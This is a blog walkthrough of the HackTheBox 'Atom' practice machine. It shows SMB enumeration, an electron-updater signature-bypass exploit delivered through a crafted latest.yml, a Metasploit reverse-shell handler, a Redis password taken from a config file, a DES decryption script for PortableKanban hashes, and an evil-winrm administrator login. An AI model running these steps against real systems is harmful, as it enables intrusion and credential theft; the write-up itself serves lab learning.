HackTheBox: Atom Machine Walkthrough – Medium Difficulty

Written by darknite -
on April 20, 2021

In this post, i would like to share a walkthrough on Atom Machine.

This room is been considered difficulty rated as a Medium machine

Testing

Information Gathering on Atom machine

Once we have started the VPN connection, we can start the information gathering on the machine by executing the command nmap -sC -sV <IP Address> -PN 

Let’s see the website interface.

Nothing that we can look on the website interface.

Based on the nmap result, I notice that port 445 is open which normally used for SMB service

For those are not familiar with SMB service, you guys can read over here

We can see the file stored in smb service by running smbclient -L //10.10.10.237/ and we notice that Software_Updates is saved as one of the sharename in the service.

Let’s enumerate the Software_Updates share name further by executing the command smbclient //10.10.10.237/Software_Updates -U ” “

For this activity, there’s no password is needed to proceed further

We have folder client1,client2 and client3 with a PDF file name UAT_Testing_Procedures.pdf

We can investigate the PDF file by downloading it using get UAT_Testing_Procedures.pdf into our machine.

Gaining the Access on Atom machine

There’s no file stored on either folder client1, client2 and client3

Before we put the latest.yml file into one of the folders, we need to read the PDF file such as below

Why need to put the latest.yml into the machine, it’s because we are using an electron-builder based on the PDF file above. I have done some research on the internet

We will be able to understand the exploit from the website Signature Validation Bypass Leading to RCE In Electron-Updater · Doyensec’s Blog

From my understanding of the PDF file, we need to do the step as shown below:

Firstly, we need to create a crafted exploit for us to get the reverse shell connection back to us.

We get the hashes on the crafted file by using sha512sum filename

# Reminder: We need to get a new sha512sum whenever we recreated the crafted malicious file #

We will be using cyberchef to encode it from Hex binary into base64 binary as shown above.

Maintaining the Access on Atom machine

Next, we need to use the Metasploit tool to get the reverse shell which we need to execute msfconsole command to start the Metasploit 

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST <VPN's IP address>
set LPORT <PORT that you use on msfvenom exploit>
run

We will be moving on to the next step in the activity by creating latest.yml file

The file will look something such to shown in the screenshot above. We need to add the sha512 encode on the cyberchef website over here and save everything on latest.yml

We need to start our python server on the directory in that we save latest.yml

It will take a few seconds depending on our machine.

We managed to get the meterpreter session when we look back on the Metasploit terminal.

I should be able to penetrate the machine by executing shell -i command

We can read the user flag by typing the command “type C:\Users\jason\Desktop\user.txt

Escalate to Root Privileges Access on Atom machine

We can get the Windows SUID from Winpeas.sh but i will find it manually.

Based on my experience, there should be a suspicious file stored on C:\Program Files\ and we managed to find Redis Folder.

When we look carefully at the Redis Folder, we notice that redis.windows-service.conf and redis.windows.conf did standout compared to another file over here.

We can read the conf file by using the command “type redis.windows-service.conf” and we have gotten a password kidvscat_yes_kidvscat

Based on my research on the redis tools, we found some information like below:

Now, we should install the redis-tools on our Kali Linux Machine by executing the command apt-get install redis-tools

It will take a while to complete

We need to execute. the command below for us to get the hash

redis-cli -h 10.10.10.237. -a kidvscat_yes_kidvscat
keys *
get pk:urn:user:e8e29158-d70d-44b1-a1ba-494d52790a0

Now, we managed to get the hashes and need to decrypt them to proceed to the next step. However, we don’t know how to decrypt it.

We found a PDF file named User Guide.pdf which is located at C:\Users\jason\Download\PortableKanban

Honestly, i never use PortableKanban in my entire life and we need to do some research on it.

What we should be getting is a python shell that is shown in the first result above (link here). An example of the script can be seen below

I stumbled upon an error on this python script because we don’t have PoratableKanban.pk3 installed on our Kali Linux OS. Let’s modify the code to meet our requirement for the machine

It will look something like the below:

import json
import base64
from des import * #python3 -m pip install des
try:
    hash = str(input("Enter the Hash : "))
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
    print("Wrong Hash")

For the script to be working well, you need to install des by executing pip3 install des

Once we have managed to install des, it works well. We just need to key-in the hash that we found earlier to get decrypted password

We need to run evil-winrm to get the root flag which the command is ruby evil-winrm -i 10.10.10.237 -u ‘administrator’ -p ‘kidvscat_admin_@123’

Once we are gains the Shell, we need to read the root flag at C:\Users\Administrator\Desktop directory. Finally, we can read it by using the command “type root.txt”

-THE END-

Happy Learning Guys!

Categories:

Medium Machine

Tags:

Challengescyberchefevil-winrmHackTheBoxjsonmsfvenomPenetration Testingpython3redisredis-toolssha512sumsmbclientWindowswinpeasyml file

No responses yet

Leave a Reply

Your email address will not be published. Required fields are marked *